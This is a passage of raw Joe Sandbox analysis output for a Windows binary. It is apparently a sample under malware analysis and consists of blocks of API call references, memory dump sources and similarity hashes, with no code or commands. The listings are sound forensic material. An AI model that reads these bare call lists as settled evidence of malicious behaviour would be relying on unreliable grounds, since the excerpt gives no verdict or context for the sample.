                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 002D7BE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                          • String ID: static
                                                          • API String ID: 2559357485-2160076837
                                                          • Opcode ID: d2b668ba1636336d53fc230cc9d138b1e59b0991f1561126c9312f34bbe854f1
                                                          • Instruction ID: 164ae127e1eec9c01f6743e0bc55ea850a420a95d2d66e4cc7c7227584b99631
                                                          • Opcode Fuzzy Hash: d2b668ba1636336d53fc230cc9d138b1e59b0991f1561126c9312f34bbe854f1
                                                          • Instruction Fuzzy Hash: D331BE32154215AFDF119FA4DC88FDB3B69FF09324F100216FA15AA2A0D775DC62DBA4
                                                          APIs
                                                          • _memset.LIBCMT ref: 0027706B
                                                            • Part of subcall function 00278D58: __getptd_noexit.LIBCMT ref: 00278D58
                                                          • __gmtime64_s.LIBCMT ref: 00277104
                                                          • __gmtime64_s.LIBCMT ref: 0027713A
                                                          • __gmtime64_s.LIBCMT ref: 00277157
                                                          • __allrem.LIBCMT ref: 002771AD
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002771C9
                                                          • __allrem.LIBCMT ref: 002771E0
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002771FE
                                                          • __allrem.LIBCMT ref: 00277215
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00277233
                                                          • __invoke_watson.LIBCMT ref: 002772A4
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                          • String ID:
                                                          • API String ID: 384356119-0
                                                          • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                          • Instruction ID: 0cd732e87482a23b0ed4fef2967ad1ddfe9552496b4d8cea143787211aada74a
                                                          • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                          • Instruction Fuzzy Hash: 0A71FB71A25717ABD714EE79CC41B5AB3A8AF11720F14C23AF91CE76C1E770D9608B90
                                                          APIs
                                                          • _memset.LIBCMT ref: 002B2CE9
                                                          • GetMenuItemInfoW.USER32(00317890,000000FF,00000000,00000030), ref: 002B2D4A
                                                          • SetMenuItemInfoW.USER32(00317890,00000004,00000000,00000030), ref: 002B2D80
                                                          • Sleep.KERNEL32(000001F4), ref: 002B2D92
                                                          • GetMenuItemCount.USER32(?), ref: 002B2DD6
                                                          • GetMenuItemID.USER32(?,00000000), ref: 002B2DF2
                                                          • GetMenuItemID.USER32(?,-00000001), ref: 002B2E1C
                                                          • GetMenuItemID.USER32(?,?), ref: 002B2E61
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002B2EA7
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B2EBB
                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B2EDC
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                          • String ID:
                                                          • API String ID: 4176008265-0
                                                          • Opcode ID: 074db1ff10af05ab0a92c27ee333c53fac1290d8a45d81a1fe61ce605e632d55
                                                          • Instruction ID: fa0534d39b3803b88495ab76f4af337ddf99a35bffd56b66c599a1d45a94005c
                                                          • Opcode Fuzzy Hash: 074db1ff10af05ab0a92c27ee333c53fac1290d8a45d81a1fe61ce605e632d55
                                                          • Instruction Fuzzy Hash: B761AC7092034AEFDB11DF65DC88AEE7BB8EB05384F144459F841AB251D771ED6ACB20
                                                          APIs
                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002D75CA
                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002D75CD
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 002D75F1
                                                          • _memset.LIBCMT ref: 002D7602
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002D7614
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002D768C
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$LongWindow_memset
                                                          • String ID:
                                                          • API String ID: 830647256-0
                                                          • Opcode ID: 1f6d93ff6614e0ad7d53569b2087bcd20d03f8a21d6318a49bfe343350caed23
                                                          • Instruction ID: 73bd1c1d7d70671df516eca2e416206c532d7fb7930cc340f160ae6e765d4104
                                                          • Opcode Fuzzy Hash: 1f6d93ff6614e0ad7d53569b2087bcd20d03f8a21d6318a49bfe343350caed23
                                                          • Instruction Fuzzy Hash: 39619A75910208AFDB11DFA8CC85EEEB7F8EB09710F14409AFA14A73A1D774AD51DBA0
                                                          APIs
                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 002A77DD
                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 002A7836
                                                          • VariantInit.OLEAUT32(?), ref: 002A7848
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 002A7868
                                                          • VariantCopy.OLEAUT32(?,?), ref: 002A78BB
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 002A78CF
                                                          • VariantClear.OLEAUT32(?), ref: 002A78E4
                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 002A78F1
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002A78FA
                                                          • VariantClear.OLEAUT32(?), ref: 002A790C
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002A7917
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                          • String ID:
                                                          • API String ID: 2706829360-0
                                                          • Opcode ID: 6e8020c2bbee556c04d4a4f616d2eb223fab3c2a05870695b1b61375e67a7a6a
                                                          • Instruction ID: dfd79915484abb43bfb991d652c5bfabb64597f1dc06ea4ae35e34b8594b58f0
                                                          • Opcode Fuzzy Hash: 6e8020c2bbee556c04d4a4f616d2eb223fab3c2a05870695b1b61375e67a7a6a
                                                          • Instruction Fuzzy Hash: BC417735A10119DFCB00DFA4DC88DADBBB9FF08314F008069E955AB261CB74A996CFA4
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 002B0530
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 002B05B1
                                                          • GetKeyState.USER32(000000A0), ref: 002B05CC
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 002B05E6
                                                          • GetKeyState.USER32(000000A1), ref: 002B05FB
                                                          • GetAsyncKeyState.USER32(00000011), ref: 002B0613
                                                          • GetKeyState.USER32(00000011), ref: 002B0625
                                                          • GetAsyncKeyState.USER32(00000012), ref: 002B063D
                                                          • GetKeyState.USER32(00000012), ref: 002B064F
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 002B0667
                                                          • GetKeyState.USER32(0000005B), ref: 002B0679
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: f978ea97b070b3a769aaa0c79a5848624064a791129e637592ae31a499011a47
                                                          • Instruction ID: 6c361cf5660c61be1f1fc423cc80b68fd81cb4da7971eb0ba451920506aea3df
                                                          • Opcode Fuzzy Hash: f978ea97b070b3a769aaa0c79a5848624064a791129e637592ae31a499011a47
                                                          • Instruction Fuzzy Hash: 2641B5209547CB5DFF328E6488843F7BFA4BB51384F44405AD5C54A5C2EBD499F48F91
                                                          APIs
                                                            • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
                                                            • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
                                                          • CoInitialize.OLE32 ref: 002C8AED
                                                          • CoUninitialize.OLE32 ref: 002C8AF8
                                                          • CoCreateInstance.OLE32(?,00000000,00000017,002E3BBC,?), ref: 002C8B58
                                                          • IIDFromString.OLE32(?,?), ref: 002C8BCB
                                                          • VariantInit.OLEAUT32(?), ref: 002C8C65
                                                          • VariantClear.OLEAUT32(?), ref: 002C8CC6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                          • API String ID: 834269672-1287834457
                                                          • Opcode ID: 6464941d4f169280eb3967aab0de2ce79fad43ecc06789e29a0c9d41c41fb53f
                                                          • Instruction ID: 9842c6ee7aeda6e6789416cbeaab510c347a36c5401202f31b0574ff9a11bcca
                                                          • Opcode Fuzzy Hash: 6464941d4f169280eb3967aab0de2ce79fad43ecc06789e29a0c9d41c41fb53f
                                                          • Instruction Fuzzy Hash: F661B1702257119FD714DF14C888F6EB7E8AF45718F00894EF9859B291CB70EE58CBA6
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 002BBB13
                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 002BBB89
                                                          • GetLastError.KERNEL32 ref: 002BBB93
                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 002BBC00
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                          • API String ID: 4194297153-14809454
                                                          • Opcode ID: 05d423f1e5a39f39703b5a9d63d367f01c77dae7894e03e6c2a64fbc9fceaad6
                                                          • Instruction ID: b300dbde1bb72b178bf20a4fe102ef91f06d954a3e0f285a55a5aa438ea26372
                                                          • Opcode Fuzzy Hash: 05d423f1e5a39f39703b5a9d63d367f01c77dae7894e03e6c2a64fbc9fceaad6
                                                          • Instruction Fuzzy Hash: 0D31D735A20209AFCB12EF68C899EEDB7B8EF44348F148065ED05D72D5DBF09962CB51
                                                          APIs
                                                          • LoadIconW.USER32(00000000,00007F03), ref: 002B357C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: IconLoad
                                                          • String ID: ,z10z1$,z10z1$blank$info$question$stop$warning
                                                          • API String ID: 2457776203-4168031347
                                                          • Opcode ID: 8cf5004c74c10817f6f408d5cb46f6e195f270cdd4c950bd70de9d6466b18765
                                                          • Instruction ID: 6e3c77fff3cb0028411e18ea234e8d13bbd38619c2287e0745b5be6d44ea751a
                                                          • Opcode Fuzzy Hash: 8cf5004c74c10817f6f408d5cb46f6e195f270cdd4c950bd70de9d6466b18765
                                                          • Instruction Fuzzy Hash: CE112B72769347BEE725CE14DC92CEA779CDF0D3A0B50001AF514661C1E7B46F505BA0
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 002AB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002AB7BD
                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 002A9BCC
                                                          • GetDlgCtrlID.USER32 ref: 002A9BD7
                                                          • GetParent.USER32 ref: 002A9BF3
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 002A9BF6
                                                          • GetDlgCtrlID.USER32(?), ref: 002A9BFF
                                                          • GetParent.USER32(?), ref: 002A9C1B
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 002A9C1E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: ed8f64461e7b8f35db60790983507cafc839fb36db155eac921c9f196ddd5a0e
                                                          • Instruction ID: c50342d343ad19ffa48e8fc6777458c518c8d23e88e8ea61b5f8408338fdf0ca
                                                          • Opcode Fuzzy Hash: ed8f64461e7b8f35db60790983507cafc839fb36db155eac921c9f196ddd5a0e
                                                          • Instruction Fuzzy Hash: C121E071950244ABCF00EBA1DC99EFEBBA9EF9A310F000116F961972D1DBB459B5DE20
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 002AB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002AB7BD
                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 002A9CB5
                                                          • GetDlgCtrlID.USER32 ref: 002A9CC0
                                                          • GetParent.USER32 ref: 002A9CDC
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 002A9CDF
                                                          • GetDlgCtrlID.USER32(?), ref: 002A9CE8
                                                          • GetParent.USER32(?), ref: 002A9D04
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 002A9D07
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: ef98698e382e2c2a680e1a802bacea7f3e2ba27b6aae6577e307e5d9aa1a0ad3
                                                          • Instruction ID: 7aeb472c481912a4a1188c08229b48980c076ae980492f396b0585aee6e271fd
                                                          • Opcode Fuzzy Hash: ef98698e382e2c2a680e1a802bacea7f3e2ba27b6aae6577e307e5d9aa1a0ad3
                                                          • Instruction Fuzzy Hash: 7C21C171950244ABDF00ABA1DCC5EFEBBB9EF99300F100016F95197291DBB559B9DE20
                                                          APIs
                                                          • GetParent.USER32 ref: 002A9D27
                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 002A9D3C
                                                          • _wcscmp.LIBCMT ref: 002A9D4E
                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 002A9DC9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                          • API String ID: 1704125052-3381328864
                                                          • Opcode ID: 1c7efe7d7965d6919f81f33db41aa37531a71e860a9be4fe60d11ea34bf3c1af
                                                          • Instruction ID: 465c5445a5a905a5092a94703321da5e014e8a6625c1a3473bec9a65b14164ce
                                                          • Opcode Fuzzy Hash: 1c7efe7d7965d6919f81f33db41aa37531a71e860a9be4fe60d11ea34bf3c1af
                                                          • Instruction Fuzzy Hash: 0C11E377268B17BBFA017A25FC16DA7739CEB07320B200016FA08A40D1FEA66AF15D55
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 002C8FC1
                                                          • CoInitialize.OLE32(00000000), ref: 002C8FEE
                                                          • CoUninitialize.OLE32 ref: 002C8FF8
                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 002C90F8
                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 002C9225
                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,002E3BDC), ref: 002C9259
                                                          • CoGetObject.OLE32(?,00000000,002E3BDC,?), ref: 002C927C
                                                          • SetErrorMode.KERNEL32(00000000), ref: 002C928F
                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 002C930F
                                                          • VariantClear.OLEAUT32(?), ref: 002C931F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                          • String ID:
                                                          • API String ID: 2395222682-0
                                                          • Opcode ID: 1a0deae06d12f00e9d54899d6d38bb7b13f5744d1f5728d33a5b3414bc38469f
                                                          • Instruction ID: 3a5e360ccb7213f334941f5ced882bd7f39083e226a73a6188ba281202677da6
                                                          • Opcode Fuzzy Hash: 1a0deae06d12f00e9d54899d6d38bb7b13f5744d1f5728d33a5b3414bc38469f
                                                          • Instruction Fuzzy Hash: E4C12671214345AFD700DF64C888E2AB7E9FF89708F004A1DF98A9B251DB71ED96CB52
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 002B19EF
                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,002B0A67,?,00000001), ref: 002B1A03
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 002B1A0A
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002B0A67,?,00000001), ref: 002B1A19
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 002B1A2B
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002B0A67,?,00000001), ref: 002B1A44
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002B0A67,?,00000001), ref: 002B1A56
                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,002B0A67,?,00000001), ref: 002B1A9B
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,002B0A67,?,00000001), ref: 002B1AB0
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,002B0A67,?,00000001), ref: 002B1ABB
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                          • String ID:
                                                          • API String ID: 2156557900-0
                                                          • Opcode ID: b1357286ca6228af1e119c99f25611abfa07982fbec8d428a436aac228086c16
                                                          • Instruction ID: a511694755efc8c6a80ccbec48195927aa429a06b4e87bffe02600ab444d6359
                                                          • Opcode Fuzzy Hash: b1357286ca6228af1e119c99f25611abfa07982fbec8d428a436aac228086c16
                                                          • Instruction Fuzzy Hash: 3E31E171521245AFDB119F50FCD8BEA77AEEB58395F508115F800CA190CBB4ADA1CB64
                                                          APIs
                                                          • GetSysColor.USER32(00000008), ref: 0025260D
                                                          • SetTextColor.GDI32(?,000000FF), ref: 00252617
                                                          • SetBkMode.GDI32(?,00000001), ref: 0025262C
                                                          • GetStockObject.GDI32(00000005), ref: 00252634
                                                          • GetClientRect.USER32(?), ref: 0028C0FC
                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0028C113
                                                          • GetWindowDC.USER32(?), ref: 0028C11F
                                                          • GetPixel.GDI32(00000000,?,?), ref: 0028C12E
                                                          • ReleaseDC.USER32(?,00000000), ref: 0028C140
                                                          • GetSysColor.USER32(00000005), ref: 0028C15E
                                                          Memory Dump Source
